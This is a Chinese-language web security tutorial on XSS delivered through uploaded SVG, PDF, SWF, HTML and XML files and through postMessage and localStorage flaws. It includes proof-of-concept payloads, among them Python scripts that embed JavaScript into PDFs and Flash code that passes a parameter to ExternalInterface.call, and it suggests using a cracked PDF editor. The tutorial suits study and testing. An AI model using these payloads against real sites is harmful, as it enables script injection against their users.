Web攻防-XSS跨站&文件类型&功能逻辑&SVG&PDF&SWF&HTML&XML&PMessage&LocalStorage

知识点:

1、Web攻防-XSS跨站-文件类型-html&pdf&swf&svg&xml

2、Web攻防-XSS跨站-功能逻辑-postMessage&localStorage

一、演示案例-WEB攻防-XSS跨站-文件类型触发XSS-SVG&PDF&SWF&HTML&XML等

1、SVG-XSS

SVG(Scalable Vector Graphics)是一种基于XML的二维矢量图格式,和我们平常用的jpg/png等图片格式所不同的是SVG图像在放大或改变尺寸的情况下其图形质量不会有所损失,并且我们可以使用任何的文本编辑器打开SVG图片并且编辑它,目前主流的浏览器都已经支持SVG图片的渲染。

bash 复制代码
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
   <circle cx="100" cy="50" r="40" stroke="black" stroke-width="2" fill="red" />
   <script>alert(1)</script>
</svg>


通过文件上传功能上传一个SVG文件(该文件已经提前植入XSS代码),然后在访问这个上传后的svg地址即可触发上图效果

2、PDF-XSS

制作工具:迅捷PDF编辑器试用版

(最好网上找破解版,然后导入其他正常的pdf,在正常的pdf插入js动作)

1、创建PDF,加入动作JS









2、通过文件上传获取直链

3、直链地址访问后被触发

利用python创建一个含有XSS的PDF文件

bash 复制代码
from PyPDF2 import PdfReader, PdfWriter
# 创建一个新的 PDF 文档
output_pdf = PdfWriter()
# 添加一个新页面
page = output_pdf.add_blank_page(width=72, height=72)
# 添加js代码
output_pdf.add_js("app.alert('123');")
# 将新页面写入到新 PDF 文档中
with open("xss.pdf", "wb") as f:
    output_pdf.write(f)

使用python3运行这个python文件即可在当前目录下生成一个XSS.pdf文件,用浏览器打开这个pdf即可触发js代码

参考地址:https://www.bmabk.com/index.php/post/151955.html

bash 复制代码
和正常PDF绑定

from PyPDF2 import PdfReader, PdfWriter
# 打开原始 22.PDF 文件
input_pdf = PdfReader("22.pdf")
# 创建一个新的 PDF 文档
output_pdf = PdfWriter()
# 将现有的 PDF 页面复制到新文档
for i in range(len(input_pdf.pages)):
    output_pdf.add_page(input_pdf.pages[i])
# 添加 javaScript 代码
output_pdf.add_js("app.alert('123');")
# 将新 PDF 文档写入到文件中
with open("xssplus.pdf", "wb") as f:
    output_pdf.write(f)
    
提前准备好一个22.pdf文件,与当前py脚本放在同一个目录下,运行该py脚本即可在当前目录下生成一个xssplus.pdf


3、SWF-XSS

制作工具:Adobe Flash Professional CS6

1、新建swf文件(SWF文件是Flash动画文件格式)

2、F9进入代码区域

3、属性发布设置解析(root指当前swf文件)

bash 复制代码
//取m参数
var m=_root.m;
//调用html中Javascript中的m参数值
flash.external.ExternalInterface.call(m);





触发:?m=alert(/xss/)

实战中如何利用

1.通过文件上传自己制作的swf文件然后去访问执行

2、找到目标上存在的swf文件进行反编译后搜索关键字找xss漏洞

反编译项目:JPEXS Free Flash Decompiler

JPEXS Free Flash Decompiler工具打开这个swf文件


测试swf文件xss安全性:

1、反编译swf文件

2、查找触发危险函数

3、找可控参数访问触发
xss一是指执行恶意js,那么为什么说flash xss呢?是因为flash有可以调用js的函数,也就是可以和js通信,因此这些函数如果使用不当就会造成xss。常见的可触发xss的危险函数有:getURL,navigateToURL,ExternalInterface.call(最多),htmlText,loadMovie等等

4、HTML-XSS

bash 复制代码
单纯在HTML代码中写XSS代码即可
<script>alert(123)</script>


5、XML-XSS

XML文件本身不能执行JavaScript 代码,XML中可以加载外部的资源方式来触发XSS

流程:通过文件上传上传x.xml文件,得到x.xml文件路径,然后在上传一个xss.xml文件,代码中指向x.xml文件的路径,浏览器访问xss.xml就会触发x.xml中的xss

bash 复制代码
创建一个x.xml文件,内容如下:
<?xml version="1.0" encoding="iso-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html><body>
<script>alert(/xss/);</script>
</body></html>
</xsl:template>
</xsl:stylesheet>

然后对其进行引用:

bash 复制代码
创建一个xss.xml文件,内容如下:
<?xml version="1.0" encoding="iso-8859-1"?>
<?xml-stylesheet type="text/xsl" href="http://127.0.0.1/x.xml"?>
<test></test>


二、演示案例-WEB攻防-XSS跨站-功能逻辑触发XSS-PostMessage&LocalStorage

1、PostMessage XSS

一个用于在网页间安全地发送消息的浏览器API。它允许不同的窗口(例如,来自同一域名下的不同页面或者不同域名下的跨域页面)进行通信,而无需通过服务器。通常情况下,它用于实现跨文档消息传递(Cross-Document Messaging),这在一些复杂的网页应用和浏览器插件中非常有用。


安全原因:当发送参数可控且接收方处理不当时,将导致XSS


模拟漏洞挖掘场景

打开http://192.168.1.4:82/60/receive.html

分析源码

根据页面源码写一个xss.html文件上传上去来控制msg触发XSS

黑盒挖掘

如何去挖这种隐藏比较深的漏洞,这里强推一个国外白帽写的谷歌浏览器插件:
https://github.com/fransr/postMessage-tracker安装之后,只要是当前页面创建了message事件监听,这个插件就会定位到其代码。

白盒挖掘

找代码中此操作类函数及关键字分析

复盘:https://mp.weixin.qq.com/s/M5YIkJEoHZK6_I7nK6aj5w

2、localStorage型xss(存储型Xss升级版)

Web应用使用localStorage在用户浏览器中存储数据。localStorage允许网页在本地存储键值对,这些数据可以在浏览器关闭后仍然保留,并且在同一域名下的不同页面之间共享。当应用程序从localStorage中读取数据并将其显示在页面上时,如果没有对数据进行充分的验证和过滤,攻击者就有可能通过修改localStorage中的数据来注入恶意脚本实现XSS




安全原因:当localStorage可控且有页面有操作其数据,将导致XSS

黑盒挖掘:寻找输入点(如表单、搜索框、评论区等),构造测试用例找页面调用

白盒挖掘:查找与localStorage相关的代码段分析数据存储及数据读取

挖掘:先看目标应用localStorage

1、先找能控制的键名键值(怎么找)

2、再找对键名键值做输出操作(怎么找)

或者也可以从js里搜索userData关键字找谁调用了这个值

相关推荐
爱编程的喵44 分钟前
深入理解JavaScript节流函数:从原理到实战应用
前端·javascript·html
熊出没2 小时前
Vue前端导出页面为PDF文件
前端·vue.js·pdf
最懒的菜鸟4 小时前
MinerU将PDF转成md文件,并分拣图片
人工智能·pdf
拾光拾趣录4 小时前
在 Vue 中使用 SVG 图标
前端·vue.js·svg
web守墓人7 小时前
【前端】ikun-markdown: 纯js实现markdown到富文本html的转换库
前端·javascript·html
开开心心_Every15 小时前
便捷的电脑自动关机辅助工具
开发语言·人工智能·pdf·c#·电脑·音视频·sublime text
用什么都重名16 小时前
MinerU:高效智能PDF文档解析工具完全指南
人工智能·python·pdf·mineru·makedown
Xiaouuuuua16 小时前
一个简单的脚本,让pdf开启夜间模式
java·前端·pdf
面朝大海,春不暖,花不开17 小时前
结构化数据格式解析:JSON 与 XML 的技术应用与实践
xml·json
国家不保护废物1 天前
多模态模型数据传输的秘密武器:html5对象Blob深度解析
前端·面试·html